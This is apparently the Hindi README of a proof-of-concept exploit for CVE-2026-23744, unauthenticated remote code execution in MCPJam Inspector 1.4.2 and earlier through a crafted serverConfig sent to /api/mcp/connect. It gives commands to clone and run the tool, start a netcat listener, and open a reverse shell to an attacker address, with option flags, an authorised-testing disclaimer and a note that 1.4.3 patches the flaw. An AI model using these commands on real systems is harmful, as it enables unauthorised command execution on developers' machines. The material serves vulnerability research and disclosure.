
CVE-2026-23744 के लिए अप्रमाणित दूरस्थ कोड निष्पादन प्रमाण-अवधारणा, MCPJam Inspector को लक्षित करते हुए। निर्मित MCP serverConfig पेलोड उत्पन्न करता है /api/mcp/connect एंडपॉइंट का शोषण करने के लिए, रिवर्स शेल और ड्राई-रन डिबगिंग समर्थन के साथ।
बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन (Unauthenticated remote code execution) का PoC CVE-2026-23744 के लिए। MCPJam Inspector 1.4.2 और उससे पहले के संस्करण /api/mcp/connect के माध्यम से ऐसी कार्यक्षमता प्रकट करते हैं जो बिना प्रमाणीकरण के हमलावर-नियंत्रित MCP सर्वर कमांड लॉन्च कर सकती है।
केवल अधिकृत परीक्षण और अनुसंधान के लिए। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
serverConfig पेलोड तैयार करता है।/api/mcp/connect एंडपॉइंट को लक्षित करता है।bash -c के माध्यम से कॉन्फ़िगर किए गए कमांड को लॉन्च करता है।


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
पहले एक लिसनर शुरू करें:
rlwrap nc -lvnp 4444
फिर चलाएँ:
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
उपयोगी विकल्प:
--cmd COMMAND निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
--server-id VALUE निर्मित MCP कॉन्फ़िगर में serverId मान (डिफ़ॉल्ट: pwn)
--dry-run HTTP अनुरोध भेजे बिना पेलोड प्रवाह बनाएं
--debug एंडपॉइंट और JSON पेलोड प्रिंट करें
--verify-tls HTTPS प्रमाणपत्र सत्यापित करें
--timeout SECONDS HTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 8)
--yes रिवर्स-शेल पुष्टिकरण प्रॉम्प्ट छोड़ें
| उत्पाद | प्रभावित संस्करण | आवश्यक पहुंच | प्रभाव |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | कोई नहीं | MCPJam Inspector प्रक्रिया उपयोगकर्ता के रूप में दूरस्थ कमांड निष्पादन |
यह समस्या विशेष रूप से तब उजागर होती है जब MCPJam Inspector 0.0.0.0 पर सुनता है, जिससे दूरस्थ होस्ट डेवलपमेंट सेवा तक पहुँच सकते हैं।
/api/mcp/connect पर एक JSON पेलोड भेजता है।serverConfig.command और serverConfig.args के माध्यम से पास किया जाता है।--cmd का उपयोग करें।--dry-run --debug का उपयोग करें।1.4.3 में अपस्ट्रीम पैच शामिल है।ozcanpng — github.com/ozcanpng — ozcanpng.dev